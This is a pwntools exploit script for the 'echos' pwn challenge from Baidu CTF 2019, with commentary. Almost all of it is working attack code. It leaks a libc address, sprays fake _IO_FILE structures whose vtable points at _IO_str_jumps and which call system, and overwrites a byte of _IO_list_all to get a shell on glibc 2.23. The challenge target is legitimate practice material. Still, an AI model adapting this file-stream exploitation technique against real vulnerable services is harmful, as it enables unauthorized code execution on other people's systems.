Baidu CTF 2019 echos
#!/usr/bin/env python
from pwn import *
# Open gdb (when requested) in a side-by-side tmux pane.
context.update(terminal=['tmux', 'splitw', '-h'])

# Challenge binary. No libc ELF is loaded here: every libc offset used later
# in this script is a hard-coded constant for one particular libc build.
# libc = ELF('')
elf = ELF('./echos')
context.update(os='linux', arch=elf.arch)
# context.update(log_level='debug')  # full I/O trace while debugging

# Endpoints: 'r' reaches the CTF service, 'l' a listener on this machine.
RHOST, RPORT = "echos.r3kapig.com", 9999
LHOST, LPORT = "127.0.0.1", 9999
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of the ELF section *name*.

    ``elf`` defaults to the challenge binary loaded at module import; pass
    another ELF object to query a different file. Nothing is checked here --
    a section that does not exist surfaces as an exception from the lookup.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log ``<name>: 0x<value>`` for the variable whose name is *ss*.

    *ss* is handed to ``eval()`` in this function's scope, which resolves
    module globals such as ``'libc_base'``. Only pass literal identifiers
    written in this script: ``eval`` on anything attacker- or
    network-derived would be arbitrary code execution in the exploit
    process itself.
    """
    value = eval(ss)
    log.info("%s: 0x%x" % (ss, value))
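# --- target selection ------------------------------------------------------
# The first CLI argument (popped here so pwntools never sees it) picks how
# the binary is reached:
#   r -> remote CTF service (RHOST:RPORT)   l -> local listener (LHOST:LPORT)
#   d -> run ./echos under gdb.debug        a -> run ./echos, then attach gdb
#   anything else / no argument -> plain local process
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in ('r', 'l'):
    # Tuple membership instead of the substring test `opt in 'rl'`: that
    # form also accepted '' and 'rl', which then raised KeyError below.
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    # NOTE: the template has no '{}' placeholder, so .format() is a no-op and
    # the main/entry address is computed but never used. Add e.g.
    # 'break *{}' above 'continue' if a breakpoint is actually wanted.
    gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols else elf.entrypoint))
    conn = gdb.debug(['./echos'], gdbscript=gdbscript)
else:
    conn = process(['./echos'])
    # conn = process(['./echos'], env={'LD_PRELOAD': ''})  # pin a specific libc
if opt == 'a':
    gdb.attach(conn)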
def send(size, payload, wait=True):
    """Drive one echos round: announce *size*, then ship *payload*.

    The size goes out as its decimal string, NUL-padded to 0x1f bytes
    (presumably the width the target reads for it -- not verifiable here).
    A 10 ms pause separates the two writes so they are not coalesced into a
    single read on the far side. With *wait* set, block until the echoed
    line terminator comes back; the leak and the final round pass False
    and read the reply themselves.
    """
    size_field = str(size).ljust(0x1f, '\x00')
    conn.send(size_field)
    time.sleep(0.01)  # keep the two writes distinct on the wire
    conn.send(payload)
    if not wait:
        return
    conn.recvuntil('\n')
# exploit
# --------------------------------------------------------------------------
# Exploit stage. The target binary and its libc are not visible from this
# script, so the narration below is what the sends *appear* to do -- treat
# it as a hypothesis to confirm against ./echos in gdb, not as a spec.
#
# Python 2 script: `print x,` statements and the integer `/` in the fake
# FILE below. Under Python 3 the `/2` yields a float and p64() raises; it
# would have to become `//2`.
#
# Every libc offset here (0x3c4b00, 0x3c5520, 0x3c5540, 0x3c5590, 0x3c37a0,
# 0x45390, 0x11e70) is hard-coded for one specific libc build. Several of
# them match Ubuntu 16.04 glibc 2.23 (system 0x45390, _IO_list_all 0x3c5520,
# _IO_2_1_stderr_ 0x3c5540), but that is recognition, not verification --
# re-derive them from the challenge's libc before reusing any of this.
log.info('Pwning')

# Warm-up rounds of increasing size; each waits for the echoed line.
# Presumably shapes the heap so the 0x420 round below echoes a libc pointer.
send(0x18, 'x'*0x18)
send(0x28, 'x'*0x28)
send(0x38, 'x'*0x38)
send(0x48, 'x'*0x48)
send(0x58, 'x'*0x58)

# Leak round: one NUL byte, no wait for '\n', read the echo directly.
send(0x420, '\x00', False)
buf = conn.recv(8)
# NOTE(review): recv(8) may return fewer than 8 bytes on a slow link, in
# which case u64() raises; recvn(8) would be the strict form.
libc_base = u64(buf) - 0x3c4b00  # 0x3c4b00: offset of the leaked pointer within this libc build
dbg('libc_base')
conn.recvuntil('\n')

# Target FILE address: _IO_2_1_stderr_ (libc+0x3c5540 in this build) with
# byte 2 of the address cleared. The final round aims at _IO_list_all+3 with
# an empty payload, so the intent looks like a single-byte corruption of the
# pointer stored in _IO_list_all (normally &stderr), redirecting it to this
# lower address where the sprayed fake FILE will sit. Inferred from the mask
# and the +3, not verified against the binary.
fake_stderr = (libc_base + 0x3c5540) & 0xffffff00ffff
print hex(fake_stderr)
# The fake FILE travels in large (mmap-backed) allocations, which land below
# libc; if the redirected pointer would fall above libc_base the spray cannot
# reach it, so bail out -- ASLR decides, the exploit is simply re-run.
if libc_base < fake_stderr:
    print 'unexploitable'
    import sys  # redundant: sys is already in scope via `from pwn import *`
    sys.exit(0)

# Distance from the page holding fake_stderr up to libc. The one-off
# allocation sized from it is presumably a spacer so the 0x21000-byte sprays
# that follow land on that page (0x22000 / 0x1000 look like mapping size
# and rounding constants -- confirm with gdb).
diff = libc_base - (fake_stderr&0xfffffffff000)
dbg('diff')
send(diff - 0x22000-0x1000, 'fuga')

# Sprayed buffer: 0x520 bytes of filler, then the fake FILE. Offsets noted
# below are relative to the start of fake_file; how they line up with the
# _IO_FILE fields depends on where fake_stderr falls inside the mapping
# (chunk header + the 0x520 filler), which cannot be checked from here.
payload = 'x'*0x520
fake_file = ''
fake_file += p64(0)*4 # 0
fake_file += p64(0) + p64(0)
# +0x38: a huge value, presumably a write pointer so the stdio flush path
# takes its overflow branch.
fake_file += p64(0) + p64(0x7fffffffffffffff)
fake_file += p64(0)*2
# +0x50: the (x - 100)/2 shape is the classic buffer-length value that
# _IO_str_overflow turns back into x via 2*len+100, so libc+0x11e70 is
# presumably the argument handed to the replaced allocator below (what
# lives at that offset is not visible here). Integer division required.
fake_file += p64((libc_base + 0x11e70 - 100)/2) + p64(0) * (0xb) #
# +0xb0: "dokodemo" = "anywhere" (author's note): seemingly any readable
# libc address will do for this slot; stderr+0x50 is used.
fake_file += p64(libc_base + 0x3c5590) # dokodemo
fake_file += p64(0) *3
fake_file += p64(0)
fake_file += p64(0) * 2
# +0xe8: vtable pointer -- looks like _IO_str_jumps in glibc 2.23 (inferred).
fake_file += p64(libc_base + 0x3c37a0)
# +0xf0: function pointer reached through that vtable's overflow path -> system.
fake_file += p64(libc_base + 0x45390)
# Spray: 0x20 allocations of 0x21000 bytes each carrying the fake FILE;
# the loop counter is printed inline as a progress indicator.
for i in range(0x20):
    print i,
    send(0x21000, payload+fake_file)
# Final round: the "size" is an address (_IO_list_all+3), the payload is
# empty and no reply is awaited. The program apparently misuses the size as
# a write offset, corrupting one byte of _IO_list_all so it points at
# fake_stderr; the shell is then expected when stdio is flushed at exit.
_IO_list_all = libc_base + 0x3c5520
send(_IO_list_all+3, '', False)
conn.interactive()